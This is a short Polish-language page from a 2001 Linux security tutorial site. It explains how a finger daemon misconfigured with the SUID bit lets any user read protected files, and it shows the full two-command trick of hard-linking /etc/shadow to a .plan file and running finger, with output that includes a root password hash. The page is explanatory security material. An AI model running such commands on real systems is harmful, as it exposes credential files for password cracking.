Bezpiecze±stwo system≤w Linux'owych

Linux Security - Suidy
Strona g│≤wna

Finger
[1] [2] [3] [4] [5]
B│Ωdna konfiguracja demona odpowiedzialnego za us│ugΩ finger (nadanie mu w│▒czonego atrybutu SUID powoduje, ┐e mo┐e on odczytaµ dowolny plik. Ka┐dy u┐ytkownik ma przyporz▒dkowany w swoim katalogu domowym plik .plan, kt≤ry mo┐e zawieraµ dodatkowe informacje o u┐ytkowniku. Wystarczy powi▒zaµ go z odpowiednim plikiem i teraz odczytuj▒c informacje o w│asnym sobie mo┐na odczytaµ zawarto╢µ pliku do kt≤rego nie mieli╢my przedtem uprawnie±
[tronix@localhost]$ ln /etc/shadow .plan
[tronix@localhost]$ finger tronix
Login: tronix         	    Name:Linux user
Directory: /home/tronix         Shell: /bin/bash
On since Fri Mar 16 16:01 (CET) on tty3
No mail.
Plan:
root:zttJEkXo/9XCM:11389:0:99999:7:::
bin:*:11389:0:99999:7:::
daemon:*:11389:0:99999:7:::


ICMP - Pine - Fork - Firewall - Bezpieczne partycje
Suidy - Skanowanie - Word exportable - Backdoor'y - Sumy kontrolne
Perl - Logrotate - Shell przez WWW - Forum - KsiΩga go╢ci - Statystka - Linki

Kontakt: tronix@2com.pl
Copyright by Tronix (c)2001 All Rights Reserved